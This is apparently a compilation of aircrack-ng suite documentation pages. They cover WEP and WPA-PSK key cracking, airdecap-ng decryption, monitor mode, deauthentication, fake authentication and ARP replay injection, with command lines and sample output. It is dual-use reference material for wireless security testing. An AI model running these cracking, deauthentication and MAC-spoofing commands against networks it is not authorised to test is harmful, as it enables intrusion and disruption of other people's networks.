Wlan

Aircrack-ng

Description
aircrack-ng is the 802.11 WEP and WPA-PSK key cracking program that can recover these keys once enough encrypted packets have been captured with airodump-ng. This part of the aircrack-ng suite can perform various statistical attacks to discover WEP keys with small amounts of captured data. For cracking WPA-PSK, bruteforce and dictionary methods are included.

Screenshot

(Screenshot of aircrack-ng's WEP cracking output; the text below refers to it.)

Legend:
    1 = Keybyte
    2 = Depth of current key search
    3 = Byte the IVs leaked
    4 = Votes indicating this is correct

How does it work?


When cracking a WEP key, each byte of the key is (basically!) handled individually. With more or less mathematics, the probability that a certain byte in the key is guessed right goes up to 15% when you catch the right IV, that is, an IV that leaks the possibly correct byte. In short: the more data you have, the more information you have to analyse and to calculate statistics on how likely a certain key is. aircrack-ng then adds this to its table. In the screenshot above, we can see that at keybyte 0 the byte 0xAE has collected some votes, 50 in this case. So, mathematically, it is more likely that the key starts with AE than with 11 (which is almost half as likely). With this information, aircrack-ng starts checking the most likely key and then searches its way through the table of possibilities. If you tell aircrack-ng to use fudge factor 2 (the default, -f 2), it takes the votes of the most likely byte and checks all other candidates which are at least half as likely as this one. So it's just simple math! ;)

Explanation of the Depth Field

The best explanation is an example. You have the votes like in the screenshot above. For the first byte:

    AE(50) 11(20) 71(20) 10(12) 84(12)

Now you decide to use fudge factor 3. aircrack-ng takes the votes of the most likely byte, AE(50), and divides: 50 / 3 = 16.666666. It will test all keys with a vote > 16.6666, so AE, 11 and 71 are tested and we have a total depth of three:

    0 / 3 AE(50) 11(20) 71(20) 10(12) 84(12)

While aircrack-ng is testing keys starting with AE, it shows 0 / 3. Once it has tested all keys with that byte, it switches to the next one and displays:

    1 / 3 11(20) 71(20) 10(12) 84(12)
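As an added illustration (not part of the aircrack-ng documentation), the following Python reproduces the fudge-factor selection and the depth display from the votes quoted above, and walks the resulting candidate keys for a small table. FIRST_BYTE is the vote list from the explanation; the other two positions are taken from the first entries of key bytes 1 and 2 in the cracking output shown later on this page; all function names are mine.

```python
"""Fudge factor, candidate set and depth display, worked in Python.

Added example, not aircrack-ng code.  The vote lists are taken from this
page; the enumeration order of the key walk is this example's own choice.
"""
from itertools import product
from typing import Iterator, List, Tuple

Votes = List[Tuple[str, int]]  # (key byte as two hex digits, vote count)

# Votes for the first key byte, exactly as in the depth-field explanation.
FIRST_BYTE: Votes = [("AE", 50), ("11", 20), ("71", 20), ("10", 12), ("84", 12)]

# Leading votes for key bytes 1 and 2 of the WEP cracking output on this page.
SECOND_BYTE: Votes = [("66", 41), ("F1", 33), ("4C", 23), ("00", 19)]
THIRD_BYTE: Votes = [("5C", 89), ("52", 60), ("E3", 22)]


def candidates(votes: Votes, fudge: int) -> Votes:
    """Bytes aircrack-ng tests at one key position for a given fudge factor.

    The threshold is the top vote count divided by the fudge factor; every
    byte whose votes exceed that threshold is kept, most-voted first.  With
    fudge 3 the page's 50/3 = 16.67 keeps AE, 11 and 71 (depth 3); the
    default fudge 2 (50/2 = 25) keeps only AE (depth 1).
    """
    if fudge < 1:
        raise ValueError("fudge factor must be >= 1")
    # sorted() is stable, so ties keep the order the page lists them in.
    ranked = sorted(votes, key=lambda bv: bv[1], reverse=True)
    threshold = ranked[0][1] / fudge
    return [bv for bv in ranked if bv[1] > threshold]


def depth_lines(votes: Votes, fudge: int) -> List[str]:
    """The successive "depth" lines shown while one key position is walked.

    While the i-th candidate is being tried the display reads "i / total"
    followed by the remaining vote list from that candidate onward.
    """
    ranked = sorted(votes, key=lambda bv: bv[1], reverse=True)
    total = len(candidates(votes, fudge))
    return [
        f"{i} / {total} " + " ".join(f"{b}({v})" for b, v in ranked[i:])
        for i in range(total)
    ]


def key_walk(table: List[Votes], fudge: int) -> Iterator[str]:
    """Yield candidate keys, most-voted byte of every position first.

    In this walk the last position varies fastest (itertools.product order),
    so all keys starting with AE are exhausted before the first byte's depth
    counter moves from 0 to 1, matching the display described in the text.
    """
    per_position = [[b for b, _ in candidates(v, fudge)] for v in table]
    for combo in product(*per_position):
        yield ":".join(combo)


def keys_to_test(table: List[Votes], fudge: int, bruteforced_tail: int = 1) -> int:
    """Worst-case number of full keys to verify.

    Product of the candidate counts, times 256 for each trailing byte that is
    brute-forced rather than voted on (aircrack-ng's -x1 default brute-forces
    the last key byte).
    """
    n = 1
    for votes in table:
        n *= len(candidates(votes, fudge))
    return n * 256 ** bruteforced_tail


if __name__ == "__main__":
    for line in depth_lines(FIRST_BYTE, 3):
        print(line)
    table = [FIRST_BYTE, SECOND_BYTE, THIRD_BYTE]
    for fudge in (2, 3):
        print(f"fudge {fudge}: {keys_to_test(table, fudge)} keys worst case, "
              f"first tried {next(key_walk(table, fudge))}")
```

Raising the fudge factor widens every position's candidate list, so the worst-case key count grows multiplicatively, which is the "more time, higher likelihood of success" trade-off described for -f.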

Usage

    aircrack-ng [options] <capture file(s)>

You can specify multiple input files (either in .cap or .ivs format). Also, you can run both airodump-ng and aircrack-ng at the same time: aircrack-ng will auto-update when new IVs are available. Here's a summary of all available options:

    Option    Param.   Description
    -a        amode    Force attack mode (1 = static WEP, 2 = WPA-PSK).
    -e        essid    If set, all IVs from networks with the same ESSID will be used. This option is also required for WPA-PSK cracking if the ESSID is not broadcasted (hidden).
    -b        bssid    Select the target network based on the access point's MAC address.
    -p        nbcpu    On SMP systems: number of CPUs to use.
    -q        none     Enable quiet mode (no status output until the key is found, or not).
    -c        none     (WEP cracking) Restrict the search space to alpha-numeric characters only (0x20 - 0x7F).
    -t        none     (WEP cracking) Restrict the search space to binary coded decimal hex characters.
    -h        none     (WEP cracking) Restrict the search space to numeric characters (0x30-0x39). These keys are used by default in most Fritz!BOXes.
    -d        start    (WEP cracking) Set the beginning of the WEP key (in hex), for debugging purposes.
    -m        maddr    (WEP cracking) MAC address to filter WEP data packets. Alternatively, specify -m ff:ff:ff:ff:ff:ff to use all and every IVs, regardless of the network.
    -n        nbits    (WEP cracking) Specify the length of the key: 64 for 40-bit WEP, 128 for 104-bit WEP, etc. The default value is 128.
    -i        index    (WEP cracking) Only keep the IVs that have this key index (1 to 4). The default behaviour is to ignore the key index.
    -f        fudge    (WEP cracking) By default, this parameter is set to 2 for 104-bit WEP and to 5 for 40-bit WEP. Specify a higher value to increase the bruteforce level: cracking will take more time, but with a higher likelihood of success.
    -k        korek    (WEP cracking) There are 17 KoreK statistical attacks. Sometimes one attack creates a huge false positive that prevents the key from being found, even with lots of IVs. Try -k 1, -k 2, ... -k 17 to disable each attack selectively.
    -x/-x0    none     (WEP cracking) Disable last keybytes bruteforce.
    -x1       none     (WEP cracking) Enable last keybyte bruteforcing (default).
    -x2       none     (WEP cracking) Enable last two keybytes bruteforcing.
    -X        none     (WEP cracking) Disable bruteforce multithreading (SMP only).
    -y        none     (WEP cracking) This is an experimental single bruteforce attack which should only be used when the standard attack mode fails with more than one million IVs.
    -w        words    (WPA cracking) Path to a wordlist, or "-" (without the quotes) for standard input (stdin).

Usage Examples

The simplest case is to crack a WEP key. If you want to try this out yourself, here is a test file. The key to the test file matches the screen image above; it does not match the following example.

    aircrack-ng 128bit.ivs

Where:

128bit.ivs is the file name containing ivs.

The program responds:


    Opening 128bit.ivs
    Read 684002 packets.

       #  BSSID              ESSID                     ENCRYPTION

       1  00:14:6C:04:57:9B                            WEP (684002 IVs)

    Choosing first network as target.

If there were multiple networks contained in the file then you are given the option to select which one you want. By default, aircrack-ng assumes 128 bit encryption. The cracking process starts and once cracked, here is what it looks like:

    Aircrack-ng 0.7 r130

                    [00:00:10] Tested 77 keys (got 684002 IVs)

       KB    depth   byte(vote)
        0    0/  1   AE( 199) 29(  27) 2D(  13) 7C(  12) FE(  12) FF(   6) 39(   5) 2C(   3) 00(   0) 08(   0)
        1    0/  3   66(  41) F1(  33) 4C(  23) 00(  19) 9F(  19) C7(  18) 64(   9) 7A(   9) 7B(   9) F6(   9)
        2    0/  2   5C(  89) 52(  60) E3(  22) 10(  20) F3(  18) 8B(  15) 8E(  15) 14(  13) D2(  11) 47(  10)
        3    0/  1   FD( 375) 81(  40) 1D(  26) 99(  26) D2(  23) 33(  20) 2C(  19) 05(  17) 0B(  17) 35(  17)
        4    0/  2   24( 130) 87( 110) 7B(  32) 4F(  25) D7(  20) F4(  18) 17(  15) 8A(  15) CE(  15) E1(  15)
        5    0/  1   E3( 222) 4F(  46) 40(  45) 7F(  28) DB(  27) E0(  27) 5B(  25) 71(  25) 8A(  25) 65(  23)
        6    0/  1   92( 208) 63(  58) 54(  51) 64(  35) 51(  26) 53(  25) 75(  20) 0E(  18) 7D(  18) D9(  18)
        7    0/  1   A9( 220) B8(  51) 4B(  41) 1B(  39) 3B(  23) 9B(  23) FA(  23) 63(  22) 2D(  19) 1A(  17)
        8    0/  1   14(1106) C1( 118) 04(  41) 13(  30) 43(  28) 99(  25) 79(  20) B1(  17) 86(  15) 97(  15)
        9    0/  1   39( 540) 08(  95) E4(  87) E2(  79) E5(  59) 0A(  44) CC(  35) 02(  32) C7(  31) 6C(  30)
       10    0/  1   D4( 372) 9E(  68) A0(  64) 9F(  55) DB(  51) 38(  40) 9D(  40) 52(  39) A1(  38) 54(  36)
       11    0/  1   27( 334) BC(  58) F1(  44) BE(  42) 79(  39) 3B(  37) E1(  34) E2(  34) 31(  33) BF(  33)

             KEY FOUND! [ AE:66:5C:FD:24:E3:92:A9:14:39:D4:27:4B ]

This key can then be used to connect to the network.

Now onto cracking WPA/WPA2 passphrases. aircrack-ng can crack either type.

    aircrack-ng -w password.lst *.cap

Where:

    -w password.lst is the name of the password file. Remember to specify the full path if the file is not located in the same directory.
    *.cap is the name of the group of files containing the IVs. Notice in this case that we used the wildcard * to include multiple files.

The program responds:


    Opening wpa2.eapol.cap
    Opening wpa.cap
    Read 18 packets.

       #  BSSID              ESSID                     ENCRYPTION

       1  00:14:6C:7E:40:80  Harkonen                  WPA (1 handshake)
       2  00:0D:93:EB:B0:8C  test                      WPA (1 handshake)

    Index number of target network ?

Notice in this case that since there are multiple networks we need to select which one to attack. We select number 2. The program then responds:
    Aircrack-ng 0.7 r130

                    [00:00:03] 230 keys tested (73.41 k/s)

                            KEY FOUND! [ biscotte ]

         Master Key     : CD D7 9A 5A CF B0 70 C7 E9 D1 02 3B 87 02 85 D6
                          39 E4 30 B3 2F 31 AA 37 AC 82 5A 55 B5 55 24 EE

         Transient Key  : 33 55 0B FC 4F 24 84 F4 9A 38 B3 D0 89 83 D2 49
                          73 F9 DE 89 67 A6 6D 2B 8E 46 2C 07 47 6A CE 08
                          AD FB 65 D6 13 A9 9F 2C 65 E4 A6 08 F2 5A 67 97
                          D9 6F 76 5B 8C D3 DF 13 2F BC DA 6A 6E D9 62 CD

         EAPOL HMAC     : 52 27 B8 3F 73 7C 45 A0 05 97 69 5C 30 78 60 BD

Now you have the passphrase and can connect to the network.
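As an added example (not part of the aircrack-ng documentation), the Python below derives the value aircrack-ng prints as "Master Key": WPA-PSK defines it as PBKDF2-HMAC-SHA1 over the passphrase with the ESSID as salt, 4096 iterations, 32 bytes. The ESSID "test" and passphrase "biscotte" come from the output above; the function names are mine, and the hex form is the one airdecap-ng's -k option takes.

```python
"""WPA/WPA2-PSK Pairwise Master Key derivation (added example, not aircrack-ng code).

PMK = PBKDF2-HMAC-SHA1(passphrase, ESSID, 4096 iterations, 32 bytes).
The ESSID is the only salt, so the same passphrase yields a different PMK on
every network, and the passphrase is the only secret, which is why a list of
candidate passphrases is all a cracker needs.  The hex form is what
airdecap-ng accepts with -k, so a capture of your own network can be
decrypted without putting the passphrase itself on the command line.
"""
import hashlib
import hmac
from typing import List

PBKDF2_ROUNDS = 4096   # fixed by the WPA specification
PMK_LEN = 32           # 256-bit key


def wpa_pmk(passphrase: str, essid: str) -> bytes:
    """Derive the PMK exactly as a WPA-PSK station or access point does."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA-PSK passphrases are 8 to 63 ASCII characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"),
                               essid.encode("utf-8"), PBKDF2_ROUNDS, PMK_LEN)


def airdecap_hex(pmk: bytes) -> str:
    """Hex string in the form airdecap-ng -k expects (no separators)."""
    return pmk.hex()


def master_key_lines(pmk: bytes) -> List[str]:
    """Render the PMK the way aircrack-ng prints 'Master Key': two rows of 16 bytes."""
    octets = [f"{b:02X}" for b in pmk]
    return [" ".join(octets[:16]), " ".join(octets[16:])]


def pmk_matches(passphrase: str, essid: str, expected_hex: str) -> bool:
    """Constant-time check of a passphrase against a known PMK.

    For a network owner this confirms that a PMK printed by aircrack-ng (or
    configured on an AP) really belongs to a given passphrase and ESSID.
    """
    return hmac.compare_digest(wpa_pmk(passphrase, essid), bytes.fromhex(expected_hex))


if __name__ == "__main__":
    pmk = wpa_pmk("biscotte", "test")
    rows = master_key_lines(pmk)
    print("Master Key     :", rows[0])
    print("                ", rows[1])
    print("airdecap-ng -k", airdecap_hex(pmk))
    # Same passphrase, different ESSID: a completely different key.
    print("differs on ESSID 'Harkonen':", wpa_pmk("biscotte", "Harkonen") != pmk)
```

Each candidate passphrase costs 4096 PBKDF2 rounds per ESSID, which is the whole cost behind the "keys tested per second" figure in the output; it is also why the passphrase, not the ESSID, must carry all the entropy.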

Usage Tips
How to make guesses for which option to use

Primarily, you just look at the beginning of the key. The votes for the first 5 keybytes are very good, so you can assume they are at least 99.5% correct. If these bytes are, for example, 75:47:99:22:50, it is quite obvious that the whole key may consist only of decimal digits, like the first 5 bytes, so it MAY improve your cracking speed to use the -t option and only try such keys. If the bytes are 37:30:31:33:36 (all numeric, i.e. the ASCII codes of digits), it is surely a good idea to use the -h option. And if the first few bytes are something like 74:6F:70:73:65 and, when you enter them in your hex editor, you see that this could be the beginning of some word, then it seems an ASCII key is used, so you activate the -c option to check only printable ASCII keys.

Other Tips

To specify multiple files at a time you can either use a wildcard such as * or specify each file individually, i.e.:

    aircrack-ng -w password.lst wpa.cap wpa2.eapol.cap

Determining the WPA/WPA2 passphrase is totally dependent on finding a dictionary entry which matches the passphrase. So a quality dictionary is very important. You can search the Internet for dictionaries to be used. There are many available.

As you have seen, if there are multiple networks in your files you need to select which one you want to crack. Instead of doing the selection manually, you can specify which network you want by ESSID or BSSID on the command line. This is done with the -e or -b parameters.

Another trick is to use John the Ripper to create specific passwords for testing. Let's say you know the passphrase is the street name plus 3 digits. Create a custom rule set in JTR and run something like this:

    john --stdout --wordlist=specialrules.lst --rules | aircrack-ng -e test -a 2 -w - /root/capture/wpa.cap

Usage Troubleshooting
Error message "Please specify a dictionary (option -w)": this means you have misspelt the file name of the dictionary or it is not in the current directory. If the dictionary is located in another directory, you must provide the full path to the dictionary.

aircrack-ng.txt Last modified: 2007/02/12 18:34 by darkaudax

Airdecap-ng
Description
With airdecap-ng you can decrypt WEP/WPA/WPA2 capture files. As well, it can be used to strip the wireless headers from an unencrypted wireless capture.

Usage

    airdecap-ng [options] <pcap file>

    Option   Param.   Description
    -l       none     don't remove the 802.11 header
    -b       bssid    access point MAC address filter
    -k       pmk      WPA/WPA2 Pairwise Master Key in hex
    -e       essid    target network ASCII identifier
    -p       pass     target network WPA/WPA2 passphrase
    -w       key      target network WEP key in hexadecimal

Usage Examples
The following removes the wireless headers from an open network (no WEP) capture:

    airdecap-ng -b 00:09:5B:10:BC:5A open-network.cap

The following decrypts a WEP-encrypted capture using a hexadecimal WEP key:

    airdecap-ng -w 11A3E229084349BC25D97E2939 wep.cap

The following decrypts a WPA/WPA2 encrypted capture using the passphrase:

    airdecap-ng -e 'the ssid' -p passphrase tkip.cap

Usage Tips
For ESSIDs which contain spaces, put the ESSID in quotes: 'this contains spaces'.

Usage Troubleshooting
None at this time.

airdecap-ng.txt Last modified: 2007/02/21 18:37 by darkaudax

Airmon-ng
Description
This script can be used to enable monitor mode on wireless card interfaces. It may also be used to shut down (stop) interfaces. Entering the airmon-ng command without parameters will show the interface status.

Usage
    usage: airmon-ng <start|stop> <interface> [channel]

Where:

    <start|stop> indicates if you wish to start or stop the interface. (Mandatory)
    <interface> specifies the interface. (Mandatory)
    [channel] optionally sets the card to a specific channel.

Usage Examples
Typical Uses
To start wlan0 in monitor mode:

    airmon-ng start wlan0

To start wlan0 in monitor mode on channel 8:

    airmon-ng start wlan0 8

To stop wlan0:

    airmon-ng stop wlan0

To check the status:

    airmon-ng

Madwifi-ng driver monitor mode

This describes how to put your interface into monitor mode. After starting your computer, enter iwconfig to show the current status of the wireless interfaces. It likely looks similar to the following output. Enter iwconfig:

    lo        no wireless extensions.

    eth0      no wireless extensions.

    wifi0     no wireless extensions.

    ath0      IEEE 802.11b  ESSID:""  Nickname:""
              Mode:Managed  Channel:0  Access Point: Not-Associated
              Bit Rate:0 kb/s   Tx-Power:0 dBm   Sensitivity=0/3
              Retry:off   RTS thr:off   Fragment thr:off
              Encryption key:off
              Power Management:off
              Link Quality:0  Signal level:0  Noise level:0
              Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
              Tx excessive retries:0  Invalid misc:0   Missed beacon:0

If you want to use ath0 (which is already in use):

    airmon-ng stop ath0

And the system will respond:

    Interface       Chipset         Driver

    wifi0           Atheros         madwifi-ng
    ath0            Atheros         madwifi-ng VAP (parent: wifi0) (VAP destroyed)

Now, if you do iwconfig, the system responds:

    lo        no wireless extensions.

    eth0      no wireless extensions.

    wifi0     no wireless extensions.

You can see ath0 is gone. To start ath0 in monitor mode:

    airmon-ng start wifi0

The system responds:

    Interface       Chipset         Driver

    wifi0           Atheros         madwifi-ng
    ath0            Atheros         madwifi-ng VAP (parent: wifi0) (monitor mode enabled)

Now enter iwconfig. The system responds:

    lo        no wireless extensions.

    eth0      no wireless extensions.

    wifi0     no wireless extensions.

    ath0      IEEE 802.11g  ESSID:""  Nickname:""
              Mode:Monitor  Frequency:2.457 GHz  Access Point: Not-Associated
              Bit Rate:0 kb/s   Tx-Power:15 dBm   Sensitivity=0/3
              Retry:off   RTS thr:off   Fragment thr:off
              Encryption key:off
              Power Management:off
              Link Quality=0/94  Signal level=-98 dBm  Noise level=-98 dBm
              Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
              Tx excessive retries:0  Invalid misc:0   Missed beacon:0

You can see ath0 is in monitor mode. If ath1/ath2 etc. are running, stop them first, prior to all the commands above:

    airmon-ng stop ath1

You can set the channel number by adding it to the end:

    airmon-ng start wifi0 9

Usage Tips
To confirm that the card is in monitor mode, run the command iwconfig. You can then confirm the mode is monitor and the interface name. For the madwifi-ng driver, the access point field from iwconfig shows you the MAC address of the wireless card. To determine the current channel, enter iwlist <interface name> channel. If you will be working with a specific access point, then the current channel of the card should match that of the AP. In this case, it is a good idea to include the channel number when running the initial airmon-ng command.

Usage Troubleshooting
Nothing at this time.

airmon-ng.txt Last modified: 2007/02/21 19:29 by darkaudax

Aireplay-ng
Description
Aireplay-ng is used to inject frames. Its primary function is to generate traffic for later use in aircrack-ng for cracking WEP and WPA-PSK keys. There are different attacks which can cause deauthentications for the purpose of capturing WPA handshake data, fake authentications, interactive packet replay, hand-crafted ARP request injection and ARP-request reinjection. With the packetforge-ng tool it's possible to create arbitrary ARP request frames. Most drivers need to be patched to be able to inject; don't forget to read Installing drivers.

Usage of the attacks

It currently implements a set of five different attacks:

    Attack 0: Deauthentication
    Attack 1: Fake authentication
    Attack 2: Interactive packet replay
    Attack 3: ARP request replay attack
    Attack 4: KoreK chopchop (CRC prediction)
    Attack 5: Fragmentation

Fragmentation vs. Chopchop

Here are the differences between the fragmentation and chopchop attacks.

Fragmentation

Pros

    Can obtain the full packet length of 1500 bytes of XOR. This means you can subsequently create pretty well any size of packet. Even in cases where less than 1500 bytes are collected, there is sufficient to create ARP requests.
    May work where chopchop does not.
    Is extremely fast. It yields the XOR stream extremely quickly when successful.

Cons

    Needs more information to launch it, i.e. IP address info. Quite often this can be guessed. Better still, aireplay-ng assumes source and destination IPs of 255.255.255.255 if nothing is specified. This will work successfully on most APs. So this is a limited con.
    Setup to execute the attack is more subject to the device drivers. For example, Atheros does not generate the correct packets unless the wireless card is set to the MAC address you are spoofing.
    You need to be physically closer to the access point, since if any packets are lost then the attack fails.

Chopchop

Pros

    May work where fragmentation does not work.
    You don't need to know any IP information.

Cons

    Cannot be used against every access point.
    The maximum XOR bits is limited to the length of the packet you chopchop against.
    Much slower than the fragmentation attack.

Usage Troubleshooting
This item applies to all modes of aireplay-ng. Make sure there are no other VAPs running. There can be issues when creating a new VAP in monitor mode while there is an existing VAP in managed mode. You should first stop ath0, then start wifi0:

    airmon-ng stop ath0
    airmon-ng start wifi0

or

    wlanconfig ath0 destroy
    wlanconfig ath create wlandev wifi0 wlanmode monitor

aireplay-ng.txt Last modified: 2007/02/21 21:15 by darkaudax

Deauthentication
Description
This attack sends disassociate packets to one or more clients which are currently associated with a particular access point. Disassociating clients can be done for a number of reasons:

    Recovering a hidden ESSID. This is an ESSID which is not being broadcast. Another term for this is "cloaked".
    Capturing WPA/WPA2 handshakes by forcing clients to reauthenticate.
    Generating ARP requests (Windows clients sometimes flush their ARP cache when disconnected).

Of course, this attack is totally useless if there are no associated wireless clients.

Usage

    aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0

Where:

    -0 means deauthentication
    1 is the number of deauths to send (you can send multiple if you wish); 0 means send them continuously
    -a 00:14:6C:7E:40:80 is the MAC address of the access point
    -c 00:0F:B5:34:30:30 is the MAC address of the client to deauthenticate; if this is omitted then all clients are deauthenticated
    ath0 is the interface name

Usage Examples
Typical Deauthentication
First, you determine a client which is currently connected. You need its MAC address for the following command:

    aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0

Where:

    -0 means deauthentication
    1 is the number of deauths to send (you can send multiple if you wish)
    -a 00:14:6C:7E:40:80 is the MAC address of the access point
    -c 00:0F:B5:34:30:30 is the MAC address of the client you are deauthing
    ath0 is the interface name

Here is what the output looks like:

    11:09:28  Sending DeAuth to station   -- STMAC: [00:0F:B5:34:30:30]

WPA/WPA2 Handshake capture with an Atheros

    airmon-ng start ath0
    airodump-ng -c 6 --bssid 00:14:6C:7E:40:80 -w out ath0
    (switch to another console)
    aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AB:CB:9D ath0
    (wait for a few seconds)
    aircrack-ng -w /path/to/dictionary out.cap

Here is the explanation of the above commands:

    airodump-ng -c 6 --bssid 00:14:6C:7E:40:80 -w out ath0

Where:

    -c 6 is the channel to listen on
    --bssid 00:14:6C:7E:40:80 limits the packets collected to this one access point
    -w out is the file prefix of the file name to be written
    ath0 is the interface name

    aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AB:CB:9D ath0

Where:

    -0 means deauthentication attack
    5 is the number of groups of deauthentication packets to send out
    -a 00:14:6C:7E:40:80 is the MAC address of the access point
    -c 00:0F:B5:AB:CB:9D is the MAC address of the client to be deauthenticated
    ath0 is the interface name

Here is what the output looks like from aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AB:CB:9D ath0:

    12:55:56  Sending DeAuth to station   -- STMAC: [00:0F:B5:AB:CB:9D]
    12:55:56  Sending DeAuth to station   -- STMAC: [00:0F:B5:AB:CB:9D]
    12:55:57  Sending DeAuth to station   -- STMAC: [00:0F:B5:AB:CB:9D]
    12:55:58  Sending DeAuth to station   -- STMAC: [00:0F:B5:AB:CB:9D]
    12:55:58  Sending DeAuth to station   -- STMAC: [00:0F:B5:AB:CB:9D]

ARP request generation with a Prism2 card


    airmon-ng start wlan0
    airodump-ng -c 6 -w out --bssid 00:13:10:30:24:9C wlan0
    (switch to another console)
    aireplay-ng -0 10 -a 00:13:10:30:24:9C wlan0
    aireplay-ng -3 -b 00:13:10:30:24:9C -h 00:09:5B:EB:C5:2B wlan0

After sending the ten batches of deauthentication packets, we start listening for ARP requests with attack 3. The -h option is mandatory and has to be the MAC address of an associated client. If the driver is wlan-ng, you should run the airmon-ng script (unless you know what to type), otherwise the card won't be correctly set up for injection.

Usage Tips
It is usually more effective to target a specific station using the -c parameter. The deauthentication packets are sent directly from your PC to the clients. So you must be physically close enough to the clients for your wireless card transmissions to reach them.

Usage Troubleshooting
None at this time.

deauthentication.txt Last modified: 2007/02/21 20:21 by darkaudax

Fake authentication
This attack is only useful when you need an associated MAC address in attacks 2, 3, 4 (-h option) and there is currently no associated client. However, it is generally better to use the MAC address of a real client (like here, 00:09:5B:EB:C5:2B) in attacks 2, 3 and 4. The fake auth attack does NOT generate ARP requests. Also, subsequent attacks will likely perform better if you update the MAC address of the card, so that it properly sends ACKs:

    ifconfig ath0 down
    ifconfig ath0 hw ether 00:11:22:33:44:55
    ifconfig ath0 up
    aireplay-ng -1 0 -e 'the ssid' -a 00:13:10:30:24:9C -h 00:11:22:33:44:55 ath0

    12:14:06  Sending Authentication Request
    12:14:06  Authentication successful
    12:14:06  Sending Association Request
    12:14:07  Association successful :-)

With patched madwifi-old CVS 2005-08-14, it's possible to inject packets while in Managed mode (the WEP key itself doesn't matter, as long as the AP accepts Open-System authentication). So, instead of running attack 1, you may just associate and inject / monitor through the athXraw interface:

    ifconfig ath0 down hw ether 00:11:22:33:44:55
    iwconfig ath0 mode Managed essid 'the ssid' key AAAAAAAAAA
    ifconfig ath0 up
    sysctl -w dev.ath0.rawdev=1
    ifconfig ath0raw up
    airodump-ng ath0raw out 6

Then you can run attack 3 or 4 (aireplay-ng will automatically replace ath0 with ath0raw below):

    aireplay-ng -3 -h 00:11:22:33:44:55 -b 00:13:10:30:24:9C ath0
    aireplay-ng -4 -h 00:10:20:30:40:50 -f 1 ath0

Some access points require you to reassociate every 30 seconds, otherwise our fake client is considered disconnected. In this case, set up the periodic re-association delay:

    aireplay-ng -1 30 -e 'the ssid' -a 00:13:10:30:24:9C -h 00:11:22:33:44:55 ath0

If this attack seems to fail (aireplay-ng keeps sending authentication requests), MAC address filtering may be in place. Also make sure that:

    You are close enough to the access point.
    The driver is properly patched and installed.
    The card is configured on the same channel as the AP.
    The BSSID and ESSID (-a / -e options) are correct.
    If Prism2, make sure the firmware was updated.

fake_authentication.txt Last modified: 2006/11/19 16:12

Interactive packet replay


This attack allows you to choose a given packet for replaying; it sometimes gives more effective results than attack 3 (ARP-request reinjection). You could use it, for example, to attempt the "any data re-broadcast" attack, which only works if the AP actually re-encrypts WEP data packets:

    aireplay-ng -2 -b 00:13:10:30:24:9C -n 100 -p 0841 -h 00:09:5B:EB:C5:2B -c FF:FF:FF:FF:FF:FF ath0

You can also use attack 2 to manually replay WEP-encrypted ARP request packets, whose size is either 68 or 86 bytes (depending on the operating system):

    aireplay-ng -2 -b 00:13:10:30:24:9C -d FF:FF:FF:FF:FF:FF -m 68 -n 68 -p 0841 -h 00:09:5B:EB:C5:2B ath0
    aireplay-ng -2 -b 00:13:10:30:24:9C -d FF:FF:FF:FF:FF:FF -m 86 -n 86 -p 0841 -h 00:09:5B:EB:C5:2B ath0

Another good idea is to capture some traffic and then have a look at it with Wireshark. If two packets look like a request and a response (one client sends a packet and a very short time later the receiver answers it), then it is a good idea to try to reinject the request packet to get answers.

interactive_packet_replay.txt Last modified: 2007/01/03 19:49 by mister_x

ARP Request Replay Attack


Description
The classic ARP request replay attack is the most effective way to generate new initialization vectors (IVs), and works very reliably. The program listens for an ARP packet, then retransmits it back to the access point. This, in turn, causes the access point to repeat the ARP packet with a new IV. The program retransmits the same ARP packet over and over. However, each ARP packet repeated by the access point has a new IV. It is all these new IVs which allow you to determine the WEP key.

ARP is the address resolution protocol: a TCP/IP protocol used to convert an IP address into a physical address, such as an Ethernet address. A host wishing to obtain a physical address broadcasts an ARP request onto the TCP/IP network. The host on the network that has the address in the request then replies with its physical hardware address.

Usage
Basic usage:
    aireplay-ng -3 -b 00:13:10:30:24:9C -h 00:11:22:33:44:55 ath0

Where:

    -3 means standard ARP request replay
    -b 00:13:10:30:24:9C is the access point MAC address
    -h 00:11:22:33:44:55 is the source MAC address (either an associated client or from fake authentication)
    ath0 is the wireless interface name

Replaying a previous ARP replay. This is a special case of the interactive packet replay attack. It is present here since it is complementary to the ARP request replay attack.

    aireplay-ng -2 -r replay_arp-0219-115508.cap ath0

Where:

    -2 means interactive frame selection
    -r replay_arp-0219-115508.cap is the name of the file from your last successful ARP replay
    ath0 is the wireless card interface name

Usage Example
For all of these examples, use airmon-ng to put your card in monitor mode first. You cannot inject packets unless it is in monitor mode. For this attack, you need either the MAC address of an associated client, or a fake MAC from attack 1. The simplest and easiest way is to utilize the MAC address of an associated client. This can be obtained via airodump-ng. The reason for using an associated MAC address is that the access point will only accept and repeat packets where the sending MAC address is associated. You may have to wait for a couple of minutes, or even longer, until an ARP request shows up. This attack will fail if there is no traffic. Enter this command:

    aireplay-ng -3 -b 00:14:6c:7e:40:80 -h 00:0F:B5:88:AC:82 ath0

The system responds:

    Saving ARP requests in replay_arp-0219-123051.cap
    You should also start airodump-ng to capture replies.
    Read 11978 packets (got 7193 ARP requests), sent 3902 packets...

Initially the last line will look similar to:

    Read 39 packets (got 0 ARP requests), sent 0 packets...

Then when the attack is in progress, the zeroes become the actual counts as in the full sample above. You can also confirm this by running airodump-ng to capture the IVs being generated. It should show the data count increasing rapidly for the specific access point.

The second example we will look at is reusing the captured ARP from the example above. You will notice that it said the ARP requests were being saved in replay_arp-0219-123051.cap. So rather than waiting for a new ARP, we simply reuse the old ones with the -r parameter:

    aireplay-ng -2 -r replay_arp-0219-123051.cap ath0

The system responds:


    Size: 86, FromDS: 0, ToDS: 1 (WEP)

                 BSSID  =  00:14:6C:7E:40:80
             Dest. MAC  =  FF:FF:FF:FF:FF:FF
            Source MAC  =  00:0F:B5:88:AC:82

            0x0000:  0841 0000 0014 6c7e 4080 000f b588 ac82  .A....l~@.......
